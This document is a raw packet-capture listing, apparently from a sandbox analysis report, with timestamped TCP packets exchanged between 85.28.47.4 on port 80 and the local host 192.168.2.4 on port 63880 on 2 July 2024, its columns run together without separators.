                                            Jul 2, 2024 08:26:28.397844076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.397850037 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.397874117 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.397888899 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.398403883 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.398416042 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.398427963 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.398438931 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.398441076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.398447037 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.398453951 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.398464918 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.398474932 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.398478031 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.398488998 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.398499012 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.398504019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.398515940 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.398523092 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.398529053 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.398536921 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.398540020 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.398552895 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.398566961 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.398586035 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.399368048 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.399382114 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.399394035 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.399408102 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.399420023 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.399420977 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.399430990 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.399432898 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.399444103 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.399456978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.399460077 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.399470091 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.399478912 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.399482012 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.399492979 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.399492979 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.399507999 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.399518967 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.399523020 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.399530888 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.399547100 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.399561882 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.400321007 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.400335073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.400346994 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.400358915 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.400369883 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.400371075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.400383949 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.400397062 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.400398016 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.400408983 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.400418043 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.400423050 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.400437117 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.400437117 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.400449038 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.400460958 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.400460958 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.400469065 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.400474072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.400513887 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.400513887 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.401297092 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.401310921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.401321888 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.401333094 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.401344061 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.401355028 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.401356936 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.401367903 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.401381016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.401381016 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.401392937 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.401396990 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.401405096 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.401416063 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.401422024 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.401428938 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.401442051 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.401447058 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.401463985 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.401484013 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.402142048 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.402154922 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.402167082 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.402183056 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.402192116 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.402194023 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.402195930 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.402201891 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.402206898 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.402213097 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.402220011 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.402221918 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.402232885 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.402242899 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.402245045 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.402256966 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.402267933 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.402271032 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.402281046 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.402282000 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.402293921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.402316093 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.402339935 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.403106928 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.403120041 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.403131962 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.403142929 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.403153896 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.403155088 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.403167009 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.403178930 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.403178930 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.403192043 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.403198957 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.403204918 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.403223038 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.403247118 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.486326933 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.486366987 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.486428022 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.486449003 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.486515045 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.486566067 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.486589909 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.486641884 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.486665010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.486710072 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.486773968 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.486818075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.486819029 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.486831903 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.486860037 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.486871958 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.487004042 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.487016916 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.487030029 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.487055063 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.487082005 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.487179995 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.487191916 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.487204075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.487226009 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.487238884 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.487458944 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.487471104 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.487482071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.487498999 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.487509966 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.487510920 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.487523079 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.487529993 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.487535954 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.487551928 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.487569094 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.487731934 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.487746954 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.487757921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.487782001 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.487798929 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.487838030 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.487850904 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.487864017 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.487874985 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.487881899 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.487885952 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.487898111 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.487905025 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.487909079 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.487921000 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.487927914 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.487946033 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.487974882 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.488447905 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.488460064 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.488471031 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.488490105 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.488497972 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.488502979 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.488507986 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.488523960 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.488535881 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.488539934 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.488545895 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.488559008 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.488569975 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.488570929 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.488583088 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.488584042 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.488595009 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.488606930 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.488610983 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.488620996 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.488639116 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.488650084 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.488677025 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.489290953 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.489304066 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.489315033 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.489326954 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.489337921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.489339113 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.489351034 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.489352942 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.489362955 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.489376068 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.489382982 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.489392042 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.489414930 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.489907026 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.489918947 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.489929914 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.489940882 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.489953041 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.489959955 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.489964962 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.489976883 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.489984989 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.489988089 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.490000010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.490006924 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.490010977 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.490024090 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.490030050 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.490036011 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.490046978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.490057945 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.490067005 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.490086079 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.490098953 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.490864038 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.490876913 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.490886927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.490899086 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.490911007 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.490916967 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.490922928 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.490925074 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.490935087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.490946054 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.490952015 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.490952969 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.490963936 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.490966082 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.490978003 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.490988970 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.490993023 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.490999937 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.491010904 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.491014957 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.491023064 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.491029978 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.491056919 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.491746902 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.491760015 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.491770983 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.491791964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.491795063 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.491803885 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.491816044 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.491816044 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.491827965 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.491839886 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.491842985 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.491852999 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.491863966 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.491864920 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.491877079 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.491878033 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.491890907 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.491902113 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.491904020 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.491913080 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.491925001 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.491930008 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.491944075 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.491960049 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.492754936 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.492769003 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.492780924 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.492793083 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.492803097 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.492810011 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.492815971 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.492815971 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.492827892 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.492839098 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.492844105 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.492851019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.492862940 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.492863894 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.492875099 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.492885113 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.492887020 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.492899895 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.492899895 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.492913961 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.492924929 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.492925882 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.492935896 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.492963076 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.575320005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.575346947 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.575360060 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.575377941 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.575401068 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.575437069 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.575453043 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.575476885 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.575500965 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.575562000 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.575575113 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.575599909 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.575613976 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.575743914 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.575757027 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.575768948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.575781107 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.575783968 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.575793982 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.575798035 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.575805902 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.575822115 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.575839996 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.576060057 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.576107979 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.576113939 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.576126099 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.576137066 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.576148033 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.576158047 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.576167107 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.576188087 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.576355934 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.576370001 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.576380968 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.576391935 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.576400995 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.576404095 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.576425076 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.576447964 CEST6388080192.168.2.485.28.47.4
